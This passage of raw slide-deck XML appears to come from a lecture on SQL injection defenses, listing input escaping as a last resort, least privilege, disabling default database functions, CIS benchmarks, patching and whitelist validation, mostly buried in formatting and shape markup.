            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-190">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>else </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-175">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-145">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>considered</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-365">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-100">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>unauthorized</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" marR="5080" indent="-377190">
              <a:lnSpc>
                <a:spcPts val="3879"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="945"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1143000" algn="l"/>
                <a:tab pos="1143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-145">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Useful </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-190">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>values </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-105">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>cannot </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-150">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>be </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-120">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>specified </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-325">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>as </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-105">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>parameter </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-135">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>placeholders, </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-210">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>such </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-325">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-555">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-30">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-75">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>table</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-185">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-155">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>name.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5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600" spc="-150" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Option </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-300" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>4: </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-185" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Escaping </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-145" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>All </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-170" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>User </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-175" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Supplied</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-630" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-145" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Input</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1143000" algn="l"/>
                <a:tab pos="1143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-185">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Should </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-150">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>be </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-80">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>only </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-200">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>used </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-325">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>as </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-265">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-110">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>last</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-55">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-65">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>resort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8961120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40"/>
              <a:t>Additional</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-655"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-285"/>
              <a:t>Defenses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6193" y="2552246"/>
            <a:ext cx="11714480" cy="45313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3600" spc="-229" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Least</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-270" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-200" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Privilege</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" marR="404495" indent="-377190">
              <a:lnSpc>
                <a:spcPts val="3960"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="825"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1143000" algn="l"/>
                <a:tab pos="1143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-245">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-85">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>application </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-125">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>should </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-225">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>use </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-30">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-85">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>lowest </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-150">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>possible </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-114">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>level</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-440">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-120">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>privileges </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-105">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>when </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-235">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>accessing </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-30">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-265">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-180">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>database</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" marR="531495" indent="-377190">
              <a:lnSpc>
                <a:spcPts val="3960"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="725"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1143000" algn="l"/>
                <a:tab pos="1143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-210">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Any </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-190">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>unnecessary </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-60">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>default </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-35">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>functionality in </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-30">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-540">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-180">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>database  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-125">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>should </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-150">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>be </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-130">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>removed </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-15">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-320">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-135">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>disabled</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="395"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1143000" algn="l"/>
                <a:tab pos="1143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-235">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Ensure </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-495">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>CIS </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-135">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>benchmark </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-30">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-180">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>database </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-35">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-225">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>use </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-175">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-745">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-100">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>applied</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" marR="5080" indent="-377190">
              <a:lnSpc>
                <a:spcPts val="3960"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="819"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1143000" algn="l"/>
                <a:tab pos="1143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-80">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>All </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-150">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>vendor-issued </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-100">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>security </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-170">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>patches </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-125">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>should </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-150">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>be </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-100">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>applied </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-35">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-605">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-265">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-35">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>timely</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-190">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-125">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>fashion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6193" y="7872295"/>
            <a:ext cx="4923155" cy="122174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3600" spc="-160" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Whitelist </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-145" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Input</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-415" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-175" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Validation</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="390"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1143000" algn="l"/>
                <a:tab pos="1143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-140">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Already</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-195">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-210">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>discussed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412305" y="2110930"/>
            <a:ext cx="1352550" cy="5373370"/>
            <a:chOff x="15412305" y="2110930"/>
            <a:chExt cx="1352550" cy="5373370"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="15412305" y="3284507"/>
              <a:ext cx="1296714" cy="12942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638476" y="2110930"/>
              <a:ext cx="756416" cy="7564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947053" y="2909942"/>
              <a:ext cx="141605" cy="417830"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="141605" h="417829">
                  <a:moveTo>
                    <a:pt x="47118" y="276368"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="276368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70678" y="417725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129577" y="299928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47118" y="299928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47118" y="276368"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="141605" h="417829">
                  <a:moveTo>
                    <a:pt x="94237" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="47118" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47118" y="299928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94237" y="299928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94237" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="141605" h="417829">
                  <a:moveTo>
                    <a:pt x="141356" y="276368"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="94237" y="276368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94237" y="299928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129577" y="299928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141356" y="276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455026" y="4721950"/>
              <a:ext cx="1264045" cy="1264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968623" y="4493706"/>
              <a:ext cx="141605" cy="417830"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="141605" h="417829">
                  <a:moveTo>
                    <a:pt x="47118" y="276375"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="276379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70678" y="417725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129577" y="299928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47118" y="299928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47118" y="276375"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="141605" h="417829">
                  <a:moveTo>
                    <a:pt x="94237" y="276372"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="47118" y="276375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47118" y="299928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94237" y="299928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94237" y="276372"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="141605" h="417829">
                  <a:moveTo>
                    <a:pt x="141356" y="276368"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="94237" y="276372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94237" y="299928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129577" y="299928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141356" y="276368"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="141605" h="417829">
                  <a:moveTo>
                    <a:pt x="94237" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="47118" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47118" y="276375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94237" y="276372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="942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467592" y="6189549"/>
              <a:ext cx="1296714" cy="12942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990089" y="5896961"/>
              <a:ext cx="141605" cy="417830"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="141605" h="417829">
                  <a:moveTo>
                    <a:pt x="47118" y="276368"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="276368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70678" y="417725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129577" y="299928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47118" y="299928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47118" y="276368"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="141605" h="417829">
                  <a:moveTo>
                    <a:pt x="94237" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="47118" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47118" y="299928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94237" y="299928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94237" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="141605" h="417829">
                  <a:moveTo>
                    <a:pt x="141356" y="276368"/>
